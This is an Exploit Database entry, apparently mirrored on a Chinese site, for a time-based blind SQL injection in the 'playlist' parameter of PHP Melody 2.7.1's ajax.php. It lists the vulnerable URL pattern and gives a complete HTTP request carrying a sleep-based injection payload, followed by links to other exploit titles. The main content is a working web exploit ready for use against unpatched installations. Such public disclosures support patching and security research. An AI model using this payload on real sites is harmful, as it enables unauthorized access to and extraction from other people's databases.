PHP Melody 2.7.1 – ‘playlist’ SQL Injection

Exploit Database
15 阅读

作者： Ahmad Mahfouz

日期： 2017-12-31
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/43409/

# Exploit Title: PHP Melody v2.7.1 - SQL Injection
# Date: 30/12/2017
# Exploit Author: Ahmad Mahfouz 
# Contact: http://twitter.com/eln1x
# Vendor Homepage: http://www.phpsugar.com/ Buy http://www.phpsugar.com/phpmelody_order.html
# Version: 2.7.1
# Tested on: Mac OS
#
# SQL Injection Type: time-based blind
# Parameter: playlist
# Page: ajax.php
# URL: http://target.com/ajax.php?p=video&do=getplayer&vid=[VALID_VIDO_ID]&aid=1&player=detail&playlist=[SQLi]

 

GET /ajax.php?p=video&do=getplayer&vid=randomid&aid=1&player=detail&playlist='+(select*from(select(sleep(20)))a)+' HTTP/1.1
Host: localhost
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close

last Exploits
PHP Melody 2.7.1 – ‘playlist’ SQL Injection的更多信息

RomPager 4.34 (Multiple Router Vendors) – ‘Misfortune Cookie’ Authentication Bypass：
DamiCMS 6.0.0 – Cross-Site Request Forgery (Change Admin Password)：
MySQL Squid Access Report 2.1.4 – SQL Injection / Cross-Site Scripting：
appRain CMF – Multiple Cross-Site Request Forgery Vulnerabilities：
ManageEngine Service Desk 10.0 – Cross-Site Scripting：
SOPlanning 1.45 – ‘users’ SQL Injection：
Lending And Borrowing – ‘pid’ SQL Injection：
WorldPay Script Shop – ‘productdetail’ SQL Injection：